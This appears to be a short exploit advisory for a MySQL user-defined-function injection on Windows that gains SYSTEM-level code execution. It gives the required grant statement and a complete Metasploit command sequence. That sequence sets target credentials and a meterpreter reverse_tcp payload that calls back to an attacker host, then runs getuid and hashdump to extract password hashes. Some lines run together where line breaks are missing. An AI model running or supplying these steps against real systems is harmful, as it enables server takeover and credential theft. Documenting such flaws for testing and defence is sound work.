Timeline :
The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08
PoC provided by :
Bernardo Damele
todb
Reference(s) :
NONE
Affected version(s) :
All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.
Tested on Windows XP SP3 with :
MySQL Community 5.5.9
Description :
This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.
To exploit this weakness, the MySQL targeted user should have the following global privileges :
grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;
Commands :
use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitgetuid
hashdump